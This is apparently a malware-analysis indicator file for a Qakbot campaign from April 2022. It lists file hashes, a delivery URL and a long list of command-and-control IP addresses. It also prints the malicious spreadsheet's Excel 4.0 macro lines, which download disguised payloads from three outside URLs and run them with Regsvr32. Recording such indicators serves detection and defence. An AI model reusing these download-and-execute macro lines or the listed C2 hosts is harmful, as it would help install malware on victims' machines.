-
Notifications
You must be signed in to change notification settings - Fork 30
/
Copy pathQakbot_AA_19.04.2022.txt
190 lines (174 loc) · 4.2 KB
/
Qakbot_AA_19.04.2022.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
19.04.2022 | Qakbot | AA | Version 403.573 | Campaign | 1650264998
******************************
.url https://newcolors.com.uy/aqia/bqaouaoiamisrl
.zip b7c8c087b74a88f95e915cd22b357e38847b2aab1ef3f9f49fa46178ef42fb32
.xls 567a8a0e52a258d52c60f25778ad7ca368b9445d21dcdb8ebe0576a33fc8c8cd
.dll 29942eb47c0de0415b2507dff8822e3309dd4fcc2ac8d01434b37eb4f75efbe1
******************************
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Rfgsg", 0)
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "https://debtsolversuk.co.uk/HLpeQJZi/NbVfNbhn.png", "C:\Rfgsg\Jefseg.ooccxx")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "https://pablopereirasilvaluis.com.br/OHTvXEr9c/NbVfNbhn.png", "C:\Rfgsg\Jefsega.ooccxx")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "https://portalregionpuno.com/088aFy0Xc8ap/NbVfNbhn.png", "C:\Rfgsg\Jefsegb.ooccxx")
https://debtsolversuk.co.uk/HLpeQJZi/NbVfNbhn.png
https://pablopereirasilvaluis.com.br/OHTvXEr9c/NbVfNbhn.png
https://portalregionpuno.com/088aFy0Xc8ap/NbVfNbhn.png
*************************************************
Exec >>
EXCEL.EXE /dde C:\Users\Admin\AppData\Local\Temp\J-1514925657.xlsb
Regsvr32 /s calc
Regsvr32 C:\Rfgsg\Jefseg.ooccxx
Regsvr32 C:\Rfgsg\Jefsega.ooccxx
Regsvr32 C:\Rfgsg\Jefsegb.ooccxx
*************************************************
*************************************************
c2's
24.152.219.253:995
176.67.56.94:443
86.97.11.43:443
85.104.122.231:443
31.215.185.49:1194
86.195.158.178:2222
31.215.185.49:2222
46.198.215.152:995
81.215.196.174:443
109.228.220.196:443
190.73.3.148:2222
24.43.99.75:443
39.44.144.159:995
74.15.2.252:2222
83.110.91.58:443
38.70.253.226:2222
108.60.213.141:443
47.23.89.62:993
2.50.4.57:443
75.99.168.194:443
41.38.167.179:995
37.34.253.233:443
148.64.96.100:443
115.50.75.208:2222
140.82.49.12:443
1.161.67.235:443
85.246.82.244:443
47.23.89.62:995
180.183.134.56:2222
111.125.245.118:995
202.134.152.2:2222
82.152.39.39:443
84.241.8.23:32103
31.48.166.122:2078
41.107.224.251:443
143.0.219.6:995
46.107.48.202:443
179.174.52.27:32101
175.145.235.37:443
103.88.226.30:443
75.99.168.194:61201
203.122.46.130:443
86.98.156.198:993
5.32.41.45:443
117.248.109.38:21
102.140.71.156:443
72.76.94.99:443
189.27.113.73:443
121.7.223.59:2222
32.221.224.140:995
182.191.92.203:995
196.203.37.215:80
71.13.93.154:2222
45.9.20.200:443
173.174.216.62:443
45.76.167.26:995
144.202.2.175:995
144.202.3.39:443
144.202.2.175:443
140.82.63.183:443
149.28.238.199:443
45.63.1.12:443
45.76.167.26:443
149.28.238.199:995
140.82.63.183:995
144.202.3.39:995
45.63.1.12:995
142.184.161.168:2222
70.46.220.114:443
103.87.95.133:2222
1.161.67.235:995
37.186.54.254:995
217.164.76.203:2078
78.101.82.40:2222
197.167.63.31:993
39.52.115.81:995
121.74.167.191:995
24.178.196.158:2222
217.128.122.65:2222
86.98.208.214:2222
172.114.160.81:995
103.107.113.120:443
80.11.74.81:2222
92.132.172.197:2222
41.84.229.83:995
93.48.80.198:995
116.30.5.32:995
197.89.11.223:443
91.177.173.10:995
76.25.142.196:443
208.107.221.224:443
101.109.208.52:443
120.150.218.241:995
39.49.112.64:995
191.99.191.28:443
173.21.10.71:2222
103.139.243.207:990
174.69.215.101:443
45.46.53.140:2222
67.165.206.193:993
73.151.236.31:443
187.172.232.250:443
201.172.31.135:2222
43.252.72.97:2222
187.250.114.15:443
201.145.179.247:443
89.86.33.217:443
187.195.126.169:443
177.205.6.251:443
72.12.115.71:22
187.102.135.142:2222
100.1.108.246:443
201.13.50.41:32101
40.134.246.185:995
24.55.67.176:443
201.22.97.225:443
37.208.138.247:6883
24.139.72.117:443
179.158.105.44:443
187.207.47.198:61202
47.156.191.217:443
72.27.7.251:443
186.105.103.240:443
85.101.204.178:443
41.230.62.211:993
180.129.6.122:995
183.82.103.213:443
109.12.111.14:443
79.129.121.68:995
45.241.239.28:995
39.41.158.202:995
31.35.28.29:443
189.146.73.62:443
41.129.82.125:995
190.252.242.69:443
90.120.65.153:2078
102.182.232.3:995
184.100.157.205:443
72.66.116.235:995
47.158.25.67:443
47.180.172.159:443
77.104.81.12:443
5.95.58.211:2087
176.88.238.122:995
41.228.22.180:443
73.67.152.98:2222
76.70.9.169:2222
114.79.148.170:443
47.180.172.159:50010
72.252.201.34:990